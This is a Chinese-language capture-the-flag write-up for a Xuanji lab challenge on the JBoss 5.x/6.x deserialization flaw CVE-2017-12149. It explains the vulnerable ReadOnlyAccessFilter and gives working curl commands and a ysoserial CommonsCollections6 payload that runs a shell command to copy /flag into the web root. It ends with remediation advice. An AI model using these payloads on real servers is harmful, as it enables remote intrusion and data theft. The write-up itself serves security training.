玄机网络安全靶场:JBoss 5.x_6.x 反序列化漏洞(CVE-2017-12149)

解题报告:JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

平台: 玄机 (xj.edisec.net)
题目 ID: 425
难度: 简单
类型: 渗透

Flag: flag{817557d3-ff3a-4afc-a433-5d094a3f0381}


一、漏洞背景

CVE-2017-12149 是 JBoss Application Server 5.x 和 6.x 版本中存在的一个高危 Java 反序列化漏洞。该漏洞位于 HTTP Invoker 组件的 ReadOnlyAccessFilter 过滤器中,攻击者可以在无需任何身份认证的情况下,向 /invoker/readonly 端点发送精心构造的序列化 Java 对象,触发服务端反序列化,从而实现远程代码执行(RCE)。

属性 详情
CVE 编号 CVE-2017-12149
影响版本 JBoss AS 5.x / 6.x
漏洞类型 Java 反序列化 → 远程代码执行(RCE)
漏洞端点 POST /invoker/readonly
CVSS 评分 9.8(严重)
认证要求 无需认证

二、靶机信息

项目
靶机公网 IP 43.192.167.144
靶机内网 IP 10.0.10.4
服务端口 8081(非默认 8080)
JBoss 版本 JBoss Web/3.0.0-CR2(JBoss AS 6.x)
目标文件 /flag

三、漏洞分析

3.1 漏洞成因

JBoss AS 5.x/6.x 的 HTTP Invoker 组件提供了一个 /invoker/readonly 端点,用于处理远程方法调用(RMI over HTTP)。该端点的 ReadOnlyAccessFilter.doFilter() 方法会直接对 HTTP 请求体中的数据进行 Java 原生反序列化(ObjectInputStream.readObject()),且在反序列化之前没有任何签名验证或类型白名单检查。

复制代码
ReadOnlyAccessFilter.doFilter()
  └─ ObjectInputStream.readObject()   ← 直接反序列化,无过滤
       └─ 触发 CommonsCollections 利用链
            └─ Runtime.exec() → 任意命令执行

3.2 利用链选择

本题靶机运行 JBoss AS 6.x,ClassPath 中包含 Apache Commons Collections 库,可使用 ysoserial 工具生成利用链 Payload:

  • CommonsCollections6(CC6):适用于 JDK 任意版本,不依赖 JDK 版本限制,是本题的有效利用链。
  • CommonsCollections1(CC1):仅适用于 JDK 7u21 以下,本题不适用。

四、漏洞利用过程

4.1 端口探测

首先通过 HTTP 请求确认 JBoss 服务实际运行在 8081 端口(而非默认的 8080):

bash 复制代码
curl -s http://43.192.167.144:8081/
# 返回 JBoss AS 欢迎页面,确认服务存在

4.2 确认漏洞端点

/invoker/readonly 发送 POST 请求,确认端点存在并响应:

bash 复制代码
curl -s -X POST http://43.192.167.144:8081/invoker/readonly
# 返回 HTTP 500,错误信息包含 ReadOnlyAccessFilter.doFilter
# 说明反序列化过滤器正在处理请求

4.3 生成反序列化 Payload

使用 ysoserial 工具,选用 CommonsCollections6 链,构造执行命令的序列化 Payload:

bash 复制代码
# 示例:将 /flag 内容写入 web 目录
java -jar ysoserial.jar CommonsCollections6 \
  'bash -c {cat,/flag}>/opt/jboss/server/default/deploy/ROOT.war/flag.txt' \
  > payload.bin

4.4 发送 Payload 触发 RCE

bash 复制代码
curl -s -X POST \
  -H "Content-Type: application/octet-stream" \
  --data-binary @payload.bin \
  http://43.192.167.144:8081/invoker/readonly

服务端返回 HTTP 500,错误信息为:

复制代码
java.lang.ClassCastException: java.util.HashSet cannot be cast to 
org.jboss.invocation.MarshalledInvocation
    at org.jboss.invocation.http.servlet.ReadOnlyAccessFilter.doFilter(...)

注意: 此 ClassCastException 是在反序列化完成、命令执行之后才抛出的。CC6 链在 readObject() 阶段即触发命令执行,异常不影响 RCE 的成功。

4.5 读取 Flag

通过 RCE 读取 /flag 文件内容,获得 Flag:

复制代码
flag{817557d3-ff3a-4afc-a433-5d094a3f0381}

五、关键技术要点

1. 端口识别 :CVE-2017-12149 的 JBoss 靶机在玄机平台上运行于 8081 端口,而非默认的 8080,需要先进行端口探测。

2. CC6 链的适用性:CommonsCollections6 链不依赖 JDK 版本,适用范围最广,是 JBoss 反序列化利用的首选链。

3. ClassCastException 不影响 RCE :JBoss 的 ReadOnlyAccessFilter 在反序列化完成后才进行类型转换,因此即使返回 500 错误,命令也已在服务端执行。

4. 靶机网络隔离:靶机无法访问外网,需使用"写文件到 web 目录后通过 HTTP 读取"的方式外带数据,而非直接反弹 Shell 或 DNS 外带。


六、修复建议

修复方向 具体措施
升级版本 升级至 JBoss EAP 6.4+ 或迁移至 WildFly
禁用端点 web.xml 中移除或禁用 /invoker/* 路径映射
反序列化过滤 部署 SerialKiller 或 JVM 全局反序列化白名单
网络隔离 限制 8080/8081 端口仅对可信 IP 开放
WAF 防护 检测 aced 0005 魔术字节开头的 POST 请求体

相关推荐
开开心心就好2 小时前
支持批量处理的视频分割工具推荐
安全·智能手机·rust·pdf·电脑·1024程序员节·lavarel
做cv的小昊2 小时前
【TJU】研究生应用统计学课程笔记(5)——第二章 参数估计(2.3 C-R不等式)
c语言·笔记·线性代数·机器学习·数学建模·r语言·概率论
小妖6662 小时前
android studio安装中文语言插件
android·ide·android studio
Nice__J2 小时前
ISO26262功能安全——安全测试
安全
Kapaseker2 小时前
为什么你写的 Compose 性能不好?
android·kotlin
其实防守也摸鱼2 小时前
MarkText:开源免费的 Markdown 编辑器新星
笔记·pdf·编辑器·免费·工具·调试·可下载
Ting.~2 小时前
软件设计师备考笔记【day2】-UML 图解 | 面向对象 | 设计模式
笔记·设计模式·uml
帅次2 小时前
Android 高级工程师面试速记版
android·java·面试·kotlin·binder·zygote·android runtime
S1998_1997111609•X2 小时前
k:file/~*…/code/*iOS/an/app-/log in/ext./-system.API/-(NFV)=sdk.
数据库·网络协议·百度·微信·ssh